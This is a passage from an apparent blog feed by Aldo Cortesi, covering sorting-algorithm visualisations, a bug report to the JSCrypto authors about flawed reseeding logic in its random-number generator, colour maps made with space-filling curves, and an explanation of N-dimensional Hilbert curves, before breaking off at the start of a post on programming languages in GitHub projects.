sort<\/h3>\n<div class=\"media\">\n    <a href=\"selectionsort.png\">\n        <img src=\"selectionsort.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Selection sort\n    <\/div>\n    \n<\/div><h2 id=\"insertion-sort\">Insertion sort<\/h2>\n<div class=\"media\">\n    <a href=\"insertionsort.png\">\n        <img src=\"insertionsort.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Insertion sort\n    <\/div>\n    \n<\/div><h3 id=\"python-s-timsort\">Python's Timsort<\/h3>\n<p>I explained the pattern you see below in a <a href=\"https:\/\/corte.si\/posts\/code\/timsort\/\">previous post visualising\nTimsort<\/a>.<\/p>\n<div class=\"media\">\n    <a href=\"timsort.png\">\n        <img src=\"timsort-small.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Timsort\n    <\/div>\n    \n<\/div><h3 id=\"quicksort\">Quicksort<\/h3>\n<div class=\"media\">\n    <a href=\"quicksort.png\">\n        <img src=\"quicksort-small.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Quicksort\n    <\/div>\n    \n<\/div><h2 id=\"the-code\">The code<\/h2>\n<p>As usual, I've published the code used to draw the images in this post. I\nextended <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/scurve\">scurve<\/a>, where I'm collecting\nalgorithms and visualisation techniques related to space-filling curves, to draw\ncolour swatches. Then I added added a \"fruitsalad\" visualisation technique to\n<a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/sortvis\">sortvis<\/a>, which houses my sorting algorithm\nvisualisation code.<\/p>\n"},{"title":"An email to the authors of JSCrypto","published":"2010-01-14T00:00:00+00:00","updated":"2010-01-14T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/jscrypto\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/jscrypto\/","content":"<div class=\"media\">\n    <a href=\"facepalm.jpg\">\n        <img src=\"facepalm.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p><strong>[Update: A fix for these problems and one noted by Peter Burns in the comments\nto this post has been posted. <a rel=\"external\" href=\"http:\/\/crypto.stanford.edu\/sjcl\/\">Get it while it's\nhot<\/a>, folks.]<\/strong><\/p>\n<p>Hi folks,<\/p>\n<p>Thanks for a <a rel=\"external\" href=\"http:\/\/crypto.stanford.edu\/sjcl\/\">blazingly fast little crypto\nlibrary<\/a>. Please find below a few comments on\nthe code.<\/p>\n<p>There's an error in the <strong>is_ready<\/strong> function of the random number generator.\nOn line 1386 of the <strong>jscrypto.js<\/strong> file, you have:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">return<\/span><span> (<\/span><span style=\"color: #005CC5;\">this<\/span><span>._pool_entropy[<\/span><span style=\"color: #005CC5;\">0<\/span><span>]<\/span><span style=\"color: #D73A49;\"> &gt;<\/span><span style=\"color: #005CC5;\"> this<\/span><span>._BITS_PER_RESEED<\/span><span style=\"color: #D73A49;\"> &amp;&amp;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">new<\/span><span> Date.<\/span><span style=\"color: #6F42C1;\">valueOf<\/span><span>()<\/span><span style=\"color: #D73A49;\"> &gt;<\/span><span style=\"color: #005CC5;\"> this<\/span><span>._next_reseed)<\/span><span style=\"color: #D73A49;\"> ?<\/span><\/span><\/code><\/pre>\n<p>This should be:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">return<\/span><span> (<\/span><span style=\"color: #005CC5;\">this<\/span><span>._pool_entropy[<\/span><span style=\"color: #005CC5;\">0<\/span><span>]<\/span><span style=\"color: #D73A49;\"> &gt;<\/span><span style=\"color: #005CC5;\"> this<\/span><span>._BITS_PER_RESEED<\/span><span style=\"color: #D73A49;\"> &amp;&amp;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">new<\/span><span style=\"color: #6F42C1;\"> Date<\/span><span>().<\/span><span style=\"color: #6F42C1;\">valueOf<\/span><span>()<\/span><span style=\"color: #D73A49;\"> &gt;<\/span><span style=\"color: #005CC5;\"> this<\/span><span>._next_reseed)<\/span><span style=\"color: #D73A49;\"> ?<\/span><\/span><\/code><\/pre>\n<p>In Safari, this will cause an error and script termination. In Firefox, the\neffect is much worse - <b>new Date.valueOf()<\/b> returns an object, which never\ncompares as greater than any integer. As an unfortunate consequence, that clause\ncan never evaluate to true, and your <a\nhref=\"http:\/\/en.wikipedia.org\/wiki\/Fortuna_(PRNG)\">Fortuna<\/a> implementation's\nperiodic reseeding never triggers...<\/p>\n<p>All is not lost, though, because luckily the <strong>random_words<\/strong> function in which\nthe return value from <strong>is_ready<\/strong> is used makes no sense. ;-) To start with, on\nline 1289 you have:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">if<\/span><span> (readiness<\/span><span style=\"color: #D73A49;\"> ==<\/span><span style=\"color: #005CC5;\"> this<\/span><span>.<\/span><span style=\"color: #005CC5;\">NOT_READY<\/span><span>)<\/span><\/span><\/code><\/pre>\n<p>But readiness here is a bit field, and this clause will evaluate to false in\nhalf the situations that <strong>is_ready<\/strong> actually does return NOT_READY. You\nsurely want<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">if<\/span><span> (readiness<\/span><span style=\"color: #D73A49;\"> &amp;<\/span><span style=\"color: #005CC5;\"> this<\/span><span>.<\/span><span style=\"color: #005CC5;\">NOT_READY<\/span><span>)<\/span><\/span><\/code><\/pre>\n<p>Three lines further down, you have:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">else if<\/span><span> (readiness<\/span><span style=\"color: #D73A49;\"> &amp;&amp;<\/span><span style=\"color: #005CC5;\"> this<\/span><span>.<\/span><span style=\"color: #005CC5;\">REQUIRES_RESEED<\/span><span>)<\/span><\/span><\/code><\/pre>\n<p>This, again, doesn't do what it seems - &amp;&amp; is the boolean and, not the bitwise\nand. Since <strong>this.REQUIRES_RESEED<\/strong> is simply a positive constant, that really\nbecomes:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">else if<\/span><span> (readiness)<\/span><\/span><\/code><\/pre>\n<p>So despite the bug in <strong>is_ready<\/strong>, your reseeding function actually runs every\ntime random data is requested. Phew - who says two wrongs don't make a right,\ney? Reseeding every time data is requested might open the generator to some\ninteresting entropy exhaustion attacks, but is much better than not reseeding at\nall.<\/p>\n<p>A corollary to all this is that you also need to address the fact that the the\nreturn value from <strong>is_ready<\/strong> is used incorrectly in the rest of your code and\nyour examples. As it stands, testing for readiness with<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">if<\/span><span> (Random.<\/span><span style=\"color: #6F42C1;\">is_ready<\/span><span>())<\/span><\/span><\/code><\/pre>\n<p>is wrong, because your readiness function can return <strong>REQUIRES_RESEED |\nNOT_READY<\/strong>, which is a positive integer. I'd recommend changing the interface\nof <strong>is_ready<\/strong> to have an obvious boolean return value instead, though -\ntyping<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">if<\/span><span> (Random.<\/span><span style=\"color: #6F42C1;\">is_ready<\/span><span>()<\/span><span style=\"color: #D73A49;\"> &amp;<\/span><span> Random.<\/span><span style=\"color: #005CC5;\">IS_READY<\/span><span>)<\/span><\/span><\/code><\/pre>\n<p>is a bit of a mouthful.<\/p>\n<p>Thanks again for jscrypto.<\/p>\n<br\/>\n<br\/>\n<p>Regards,<\/p>\n<br\/>\n<p>Aldo<\/p>\n<p><strong>[No animals were harmed producing this post. Content lightly edited for\nmarkup and formatting from the original email. Yes, I really do like JSCrypto -\nthis error-hiding-an-error was amusing, but the AES implementation seems good\n(although the jury's still out on the SHA256 portion).]<\/strong><\/p>\n"},{"title":"Generating colour maps with space-filling curves","published":"2010-01-07T00:00:00+00:00","updated":"2010-01-07T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/hilbert\/swatches\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/hilbert\/swatches\/","content":"<p>After my post about my <a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/\">Quixotic quest to draw a portrait of the Hilbert\ncurve<\/a>, Chris Mueller pointed me to some\n<a rel=\"external\" href=\"http:\/\/visualmotive.com\/colorsort\/\">fascinating related work<\/a> he had done\ngenerating colour maps of images.  Chris's method was to extract the colours\nfrom an image, sort them in natural order, and then draw the pixels out onto a\nHilbert curve. The results are pretty, but have a blotchiness that demonstrates\nthe poor clustering properties of a natural order sort nicely. If you've read my\nprevious post (you have, haven't you?), you'll be immediately struck by the idea\nthat we can improve this by sorting the pixels in order of the 3d Hilbert curve\ntraversal of the RGB colour cube (you were, weren't you?). This would give us\nnear optimal clustering, keeping similar colours together and eliminating the\nblotchiness.  If we have a Hilbert-order sorting of the pixels, we can also\nproject this onto other traversals of the pixels of the destination image. Using\nthe ZigZag curve I introduced in the previous post produces a very nice result\ntoo, showing that the order in which the RGB cube is traversed is more important\nthan the destination map.<\/p>\n<p>In the images below, <strong>natural<\/strong> is a natural-order colour sort projected onto\na Hilbert curve (Chris's method), <strong>hilbert<\/strong> is a Hilbert-curve order colour<\/p>\n<p>sort projected onto a Hilbert curve, and <strong>zigzag<\/strong> is a Hilbert-curve order\ncolour sort projected onto a ZigZag curve. I've used the same images Chris used\nto make comparison with his other interesting visualisations easy.<\/p>\n<div class=\"media left\">\n    <a href=\"original_candleslime.png\">\n        <img src=\"original_candleslime.png\"  \/>\n    <\/a>\n\n    \n<\/div><div class=\"content\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <img src=\"natural_candleslime.png\"\/>\n            <div>natural<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"hilbert_candleslime.png\"\/>\n            <div>hilbert<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"zigzag_candleslime.png\"\/>\n            <div>zigzag<\/div>\n        <\/div>\n    <\/div>\n<\/div>\n<div class=\"media left\">\n    <a href=\"original_girlpeach.png\">\n        <img src=\"original_girlpeach.png\"  \/>\n    <\/a>\n\n    \n<\/div><div class=\"content\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <img src=\"natural_girlpeach.png\"\/>\n            <div>natural<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"hilbert_girlpeach.png\"\/>\n            <div>hilbert<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"zigzag_girlpeach.png\"\/>\n            <div>zigzag<\/div>\n        <\/div>\n    <\/div>\n<\/div>\n<div class=\"media left\">\n    <a href=\"original_landscape.png\">\n        <img src=\"original_landscape.png\"  \/>\n    <\/a>\n\n    \n<\/div><div class=\"content\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <img src=\"natural_landscape.png\"\/>\n            <div>natural<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"hilbert_landscape.png\"\/>\n            <div>hilbert<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"zigzag_landscape.png\"\/>\n            <div>zigzag<\/div>\n        <\/div>\n    <\/div>\n<\/div>\n<div class=\"media left\">\n    <a href=\"original_tents.png\">\n        <img src=\"original_tents.png\"  \/>\n    <\/a>\n\n    \n<\/div><div class=\"content\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <img src=\"natural_tents.png\"\/>\n            <div>natural<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"hilbert_tents.png\"\/>\n            <div>hilbert<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"zigzag_tents.png\"\/>\n            <div>zigzag<\/div>\n        <\/div>\n    <\/div>\n<\/div>\n<div class=\"media left\">\n    <a href=\"original_tigersnack.png\">\n        <img src=\"original_tigersnack.png\"  \/>\n    <\/a>\n\n    \n<\/div><div class=\"content\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <img src=\"natural_tigersnack.png\"\/>\n            <div>natural<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"hilbert_tigersnack.png\"\/>\n            <div>hilbert<\/div>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"zigzag_tigersnack.png\"\/>\n            <div>zigzag<\/div>\n        <\/div>\n    <\/div>\n<\/div>\n<h2 id=\"sources\">Sources<\/h2>\n<p>The images are from the Flickr Creative Commons collection. The tiger image is\n\u00a9 <a rel=\"external\" href=\"http:\/\/www.flickr.com\/photos\/nikonvscanon\/2427517125\/\">David Blaikie<\/a>.\nThe girl image is \u00a9 <a rel=\"external\" href=\"http:\/\/www.flickr.com\/photos\/savannahgrandfather\/312427606\/\">Bruce\nTuten<\/a>.  The still\nlife is \u00a9\n<a rel=\"external\" href=\"http:\/\/www.flickr.com\/photos\/8363028@N08\/3077370592\/in\/photostream\/\">DeusXFlorida<\/a>.\nThe beach image is \u00a9 <a rel=\"external\" href=\"http:\/\/www.flickr.com\/photos\/hamed\/2476599906\/\">Hamed\nSaber<\/a>.  The tent image is\n\u00a9 <a rel=\"external\" href=\"http:\/\/www.flickr.com\/photos\/drusbi\/1318108463\/\">drusbi<\/a>.<\/p>\n<h2 id=\"the-code\">The code<\/h2>\n<p>I've updated the <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/scurve\">scurve<\/a> project (where I'm\ncollecting algorithms and visualisation tools related to space-filling curves)\nto include a \"colormap\" tool to generate colour maps. The images above were can\nbe generated using commands of the following form:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    colormap<\/span><span style=\"color: #005CC5;\"> -s 128 -c<\/span><span> [colour<\/span><span style=\"color: #032F62;\"> traversal]<\/span><span style=\"color: #005CC5;\"> -m<\/span><span> [map] src destination<\/span><\/span><\/code><\/pre>\n<p>There are a lot of other striking permutations and combinations to explore -\nthe colour traversal and destination map can be any of the space-filling curves\nsupported by <strong>scurve<\/strong>.<\/p>\n"},{"title":"Portrait of the Hilbert curve","published":"2010-01-03T00:00:00+00:00","updated":"2010-01-03T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/","content":"<div class=\"media\">\n    <a href=\"hilbert2d-o4.png\">\n        <img src=\"hilbert2d-o4.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Hilbert curve of order 4\n    <\/div>\n    \n<\/div>\n<p>The <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Hilbert_curve\">Hilbert curve<\/a> is a remarkable\nconstruct in many ways, but the thing that makes it <em>useful<\/em> in computer science\nis the fact that it has good clustering properties. If we take a curve like the\none above and straighten it out, points that are close together in the\ntwo-dimensional layout will also tend to be close together in the linear\nsequence.  I say \"tend to be\", because we can never get this perfectly right -\nwe can show that any curve of this type will have some points that are close to\neach other spatially but far from each other on the curve.\n<a rel=\"external\" href=\"http:\/\/citeseerx.ist.psu.edu\/viewdoc\/download?doi=10.1.1.37.3138&amp;rep=rep1&amp;type=pdf\">It<\/a>\n<a rel=\"external\" href=\"http:\/\/citeseerx.ist.psu.edu\/viewdoc\/download?doi=10.1.1.129.1888&amp;rep=rep1&amp;type=pdf\">turns<\/a>\n<a rel=\"external\" href=\"http:\/\/citeseerx.ist.psu.edu\/viewdoc\/download?doi=10.1.1.24.8236&amp;rep=rep1&amp;type=pdf\">out<\/a>,\nhowever, that the clustering behaviour of the Hilbert curve is pretty much as\ngood as we can currently get. For one example of how this property can be\nuseful, imagine that we have a database with two indexes - X and Y. We know that\nwe will be doing frequent queries on those indexes, asking for records where X\nand Y fall within specified ranges.  We can visualise this as retrieving\nrectangular regions from a two-dimensional space.  Given this scenario, how can\nwe lay out the records on disk to minimise disk access? Information on disk is\nstored sequentially, so what we want is a layout that maximises the likelihood\nthat records in any given rectangular region will also be adjacent on disk. In\nother words, what we want is a way to order our two-dimensional space of records\nso that records close to each other in two dimensions also tend to be close to\neach other in the sequential order. This is exactly the outstanding property of\nthe Hilbert curve, so one solution is to store our records on disk in Hilbert\norder.<\/p>\n<h2 id=\"visualising-the-hilbert-curve-a-first-stab\">Visualising the Hilbert curve: A first stab<\/h2>\n<p>I've long felt that the usual visualisation of the Hilbert curve - like the one\nshown at the top of this post - doesn't really do its clustering properties\njustice. The lines-and-vertices approach demonstrates how to <em>construct<\/em> the\ncurve very nicely, but it doesn't give us any intuitive feel for how close\npoints on the curve are to each other on the plane. In the remainder of this\npost, I take a stab at visualising the Hilbert curve as the great mathematician\nin the sky intended - completely covering the plane, and with each pixel\nvisually encoding its proximity to its neighbours along the curve.<\/p>\n<p>One way to proceed would be to find a way to assign a colour every pixel in a\nHilbert-order traversal of a square image. Imagine the RGB colour space as a\ncube where each colour is uniquely identified by a set of (r, g, b)\nco-ordinates. Here's one with 20 colours to a side:<\/p>\n<div class=\"media\">\n    <a href=\"ccube.png\">\n        <img src=\"ccube.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        A 20x20x20 RGB colour cube\n    <\/div>\n    \n<\/div>\n<p>We'll use a somewhat larger colour cube - 256 colours to a side, giving us 16\n777 216 unique colours. This colour cube is familiar to pretty much everyone,\nsince it's precisely the colour space we use when we specify HTML-style #rrggbb\ncolours. We can project the RGB colour cube at 1:1 resolution onto a square with\n4096 pixels to a side - this exactly matches a Hilbert curve of order 12. Now we\nneed a method for traversing the colours in the colour cube. One trivial way to\ndo this is to simply snake through all the points in the cube. In two\ndimensions, it would look like this:<\/p>\n<div class=\"media\">\n    <a href=\"zigzag-o4.png\">\n        <img src=\"zigzag-o4.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        16x16 Zigzag\n    <\/div>\n    \n<\/div>\n<p>This generalises to 3 or more dimensions easily - just imagine \"stacking\"\nplates of two-dimensional traversals in such a way that one plate's end point\nis adjacent to the next plate's starting point. For want of a better term, I've\ncalled this Zigzag order. When we project a Zigzag traversal of the RGB\ncolourspace onto a Hilbert-order traversal of the plane, we get this:<\/p>\n<div class=\"media\">\n    <a href=\"hilbert-zigzag-fullsize.png\">\n        <img src=\"hilbert-zigzag-small.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Zigzag on Hilbert\n    <\/div>\n    \n<\/div>\n<p>That's... ugly. You can vaguely make out the shape of the Hilbert curve by\ndividing the image into quadrants, and traversing them in the order in which\nthey blend into each other. But there's a problem - if we traverse the RGB\ncolour space in Zigzag order, many colours that are close to each other in 3d\nspace - and therefore visually similar - are quite far from each other in our\ntraversal order. This is what causes the blotchy artifacts in the image above.\nWhat we really want is a traversal of the RGB colour space that is as smooth and\ncontinuous as possible - meaning that colours that are close to each other in\nthe cube are also as close as possible to each other in the traversal order.\nWait a minute... that sounds familiar, doesn't it?<\/p>\n<h2 id=\"drawing-the-hilbert-curve-in-n-dimensions\">Drawing the Hilbert curve in N dimensions<\/h2>\n<p>What we really want is a 3d Hilbert curve traversal of the RGB colour cube. This\nwould mean that our colour clustering - making sure that similar colours are as\nclose as possible to each other in the sequence - would be close to optimal. We\nshould then see the clustering properties of the 2d Hilbert curve as patches of\nsimilar colour. So, does a 3d analogue to the Hilbert curve exist? Sure it does - here's\na somewhat befuddling picture of an example rendered with POV-Ray:<\/p>\n<div class=\"media\">\n    <a href=\"hilbert3d-o3.png\">\n        <img src=\"hilbert3d-o3.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        3d Hilbert curve of order 3 - the green bulb is the start of the curve\n    <\/div>\n    \n<\/div>\n<p>We can do even better than 3 dimensions, though, by generalising the Hilbert\ncurve to N dimensions. Concretely, we would like to find a way to translate an\noffset along the N-dimensional Hilbert curve to co-ordinates, and vice-versa.\nThe algorithms to do this are somewhat tricky, but are well known and widely\ndescribed. A particularly nice exposition can be found in the paper <a rel=\"external\" href=\"http:\/\/www.cs.dal.ca\/research\/techreports\/cs-2006-07\">\"Compact\nHilbert Indices\"<\/a> by Chris\nHamilton. This section is based on Hamilton's version of the classic algorithm\nfirst devised by A. R. Butz in the 1970s (though, see comments in my code for\ncorrections to some minor errors in the paper that may trip up implementers).<\/p>\n<p>We start with a slight detour - the surprising connection between the Hilbert\ncurve and <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Gray_code\">Gray codes<\/a>. Recall that Gray\ncodes are a way to traverse all numbers of a given bit width in such a way that\nonly one bit differs from each value to the next. Here, for example, are the\n2-bit and 3-bit Gray codes:<\/p>\n<h3 id=\"2-bit\">2-bit<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>0, 0<\/span><\/span>\n<span class=\"giallo-l\"><span>0, 1<\/span><\/span>\n<span class=\"giallo-l\"><span>1, 1<\/span><\/span>\n<span class=\"giallo-l\"><span>1, 0<\/span><\/span><\/code><\/pre><h3 id=\"3-bit\">3-bit<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>0, 0, 0<\/span><\/span>\n<span class=\"giallo-l\"><span>0, 0, 1<\/span><\/span>\n<span class=\"giallo-l\"><span>0, 1, 1<\/span><\/span>\n<span class=\"giallo-l\"><span>0, 1, 0<\/span><\/span>\n<span class=\"giallo-l\"><span>1, 1, 0<\/span><\/span>\n<span class=\"giallo-l\"><span>1, 1, 1<\/span><\/span>\n<span class=\"giallo-l\"><span>1, 0, 1<\/span><\/span>\n<span class=\"giallo-l\"><span>1, 0, 0<\/span><\/span><\/code><\/pre>\n<p>Now, watch what happens when we treat each set of bits in the N-bit Gray code\nas co-ordinates in N-dimensional space (with X being the rightmost bit), and\ndraw the resulting curves:<\/p>\n<table class=\"spacertable\">\n    <tr>\n        <th width=\"50%\">\n            2-bit\n        <\/th>\n        <th>\n            3-bit\n        <\/th>\n        <tr>\n            <td valign=\"top\">\n                <img src=\"hilbert2d-o1.png\" alt=\"Hilbert 2d O1\"\/>\n            <\/td>\n            <td valign=\"top\">\n                <img src=\"hilbert3d-o1.png\" alt=\"Hilbert 3d O1\"\/>\n            <\/td>\n        <\/tr>\n    <\/tr>\n<\/table>\n<p>Voila, the Order 1 Hilbert curves in 2 and 3 dimensions! A bit of pondering\nshows that this generalises to any dimension - if we have a hypercube with\ndimensions 1x1x1..., the Gray code will traverse all the vertices of the cube\nby changing only one dimension at a time. Specifically, we can say that the\nN-bit Gray code is a Hilbert order traversal of the vertices of an\nN-dimensional hypercube. Effectively, this means that we can now draw the Order\n1 Hilbert curve for any dimension - so let's refresh our memories of how the\nOrder 1 curve relates to the higher orders.<\/p>\n<table class=\"spacertable\">\n    <tr>\n        <th> O1 <\/th>\n        <th> O2 <\/th>\n        <th> O3 <\/th>\n    <\/tr>\n    <tr>\n        <td>\n            <img src=\"hilbert2d-o1-marked.png\" alt=\"Hilbert 2d O1\"\/>\n        <\/td>\n        <td>\n            <img src=\"hilbert2d-o2-marked.png\" alt=\"Hilbert 2d O2\"\/>\n        <\/td>\n        <td>\n            <img src=\"hilbert2d-o3-marked.png\" alt=\"Hilbert 2d O3\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<p>Notice that as we move from one order to the next, we replace each vertex with\na sub-curve that has the same shape as the <strong>O1<\/strong> traversal. I've marked one\npath through this recursive process in the images above, showing the subcurve\nfor the upper-left vertex in every step of the recursion. At every step, we\nalso need to transform the subcurve through rotation and reflection to make\nsure that its start matches the end of the previous subcurve, and its end\nmatches the beginning of the next subcurve. This process generalises trivially\nto N dimensions. Since the <strong>O1<\/strong> curve is just a Gray code traversal of the\nN-dimensional cube, we can think of the Order M Hilbert curve as a collection\nof hypercubes nested M deep.<\/p>\n<p>Now, let's see if we can use this construction process to figure out the\nco-ordinates of a point, given the offset along the Hilbert curve. We'll ignore\nthe rotations and reflections for the moment. We start with the <strong>O1<\/strong> curve of\ndimension N, and the N most significant bits of the offset. By checking which\nvertex of the hypercube this maps to, we can peel off the most significant bit\nof each co-ordinate. For example, if we wanted to locate offset 63 in the\n2-dimensional Order 3 curve (the upper-left corner), our first two bits would\nbe (1, 1). This is the fourth point in the Gray code traversal of the\nhypercube, which gives us the upper-left quadrant of the <strong>O1<\/strong> cube. We now\nknow that the most significant bit of our X co-ordinate is 0, and the most\nsignificant bit of our Y co-ordinate is 1. Doing the same thing for the\nmatching sub-hypercube in the <strong>O2<\/strong> curve will give us the next bit, and we\ncan drill down through the hypercubes in this way peeling off one bit of each\nco-ordinate, until we have all M bits.  This process also works in reverse - if\nwe start with a set of co-ordinates, we can drill down through the hypercubes,\ndetermining N bits of the curve offset at every step. So, generally, at every\nstep of the Gray code recursion we get a nested hypercube of dimension N, and N\nbits of co-ordinate or offset information.  Finally, we need to deal with the\nrotations and reflections required to make the heads and tails of the Gray code\nsubcurves match up. We'll need to perform this transformation at every step,\nbefore we extract our information bits. All we need is a way to rotate and\nreflect a given hypercube to make its beginning and end match up with its\nposition on the curve. The transform required turns out to map to a simple set\nof bit operations described in Section 2.3.1 of Hamilton's paper.<\/p>\n<p>And that's it - using this general process, we can now calculate co-ordinates\nor offsets for points on an N-dimensional Hilbert curve. Hopefully, I've\nmanaged to give some intuition for how this algorithm works, but I've glossed\nover pretty much all the details. See the original paper or the code I'm\npublishing for specifics. I should also note in passing that this is just one\nway to draw the Hilbert curve - at higher dimensions there are many, many\ndifferent well-formed Hilbert curves.<\/p>\n<h2 id=\"a-portrait-of-the-hilbert-curve-as-a-young-fruit-salad\">A portrait of the Hilbert curve as a young fruit salad<\/h2>\n<p>At last we are in a position to traverse the 3-dimensional RGB cube in Hilbert\norder, and have another stab at visualising the 2d Hilbert curve.<\/p>\n<div class=\"media\">\n    <a href=\"hilbert-hilbert-fullsize.png\">\n        <img src=\"hilbert-hilbert-small.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Hilbert on Hilbert\n    <\/div>\n    \n<\/div>\n<p>Ladies and gentlemen, I present a Hilbert curve traversal of the\nthree-dimensional RGB colour space, projected onto a two-dimensional Hilbert\ncurve covering the plane. I think it's absolutely damn beautiful. Like some\nweird piece of abstract art - a Kandinsky or perhaps a Pollock - the more you\nlook at this image, the more structure you see. If you divide it into quadrants,\nand sub-quadrants, and sub-sub-quadrants, you can trace the path of the Hilbert\ncurve at every level of recursion by following the flow of colours (use the 2d\nHilbert curves elsewhere in this post for reference if you're having trouble).\nIf you're looking at the full-size image, this works even at very large\nmagnifications, until the human ability to perceive colour differences starts to\nfail. Incredibly, this image contains <em>exactly<\/em> the same set of colours as the\nunattractive Zigzag visualisation at the start of the post - the only difference\nis the way the colours are arranged. This is so remarkable that you might want\nto verify this yourself using the colour analysis functionality of your\nfavourite image editor (make sure you use the full-size images for best effect).\nWe've also achieved the goal we set out with - the clustering properties of the\n2d Hilbert curve are directly visible as patches of similar colour.<\/p>\n<p>By the way - if Hilbert curves float your boat, you may also be interested in a\nprevious post of mine, in which I <a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/explorer\/\">visualise an IP geolocation database with\nHilbert curves<\/a>.<\/p>\n<h2 id=\"the-code\">The code<\/h2>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">git<\/span><span style=\"color: #032F62;\"> clone git:\/\/github.com\/cortesi\/scurve.git<\/span><\/span><\/code><\/pre>\n<p>I've released the code used to render the images in this article as a Python\nproject called <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/scurve\">scurve<\/a> (for space-filling\ncurve). This project aims to be collection of clear implementations of\nalgorithms related to space filling curves, together with a set of tools for\nvisualising them. If you're interested in this kind of thing keep an eye on the\nproject - I plan to add more interesting goodies in the next few weeks.<\/p>\n"},{"title":"The impact of language choice on github projects","published":"2009-12-15T00:00:00+00:00","updated":"2009-12-15T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/devsurvey\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/devsurvey\/","content":"<p>Although I spend a lot of my play-time fooling about with other languages, my\nprofessional and released code consists of Python, C, C++ and, alas, Javascript.\nI've lived in this tiny corner of the magic garden of modern software\ndevelopment for 10 years, and I'm itching to strike out in a different direction\nfor my next project. With this in mind, I've started to wonder about the impact\nof language choice on the development process. Are there major differences\nbetween projects in different languages? Is it possible to quantify these\ndifferences? I decided to try to gather some hard numbers. I started by writing\na small script to watch the <a rel=\"external\" href=\"http:\/\/github.com\/timeline\">public timeline<\/a> on\n<a rel=\"external\" href=\"http:\/\/www.github.com\">github<\/a>. Over a period of weeks, I collected a list of\nabout 30 thousand active projects. Using the github API, I eliminated projects\nwith less than 3 watchers, on the basis that these are likely to be small\npersonal repositories like dotfiles, programming exercises and so forth.  After\nthis, I was left with some 5000 repositories, which I 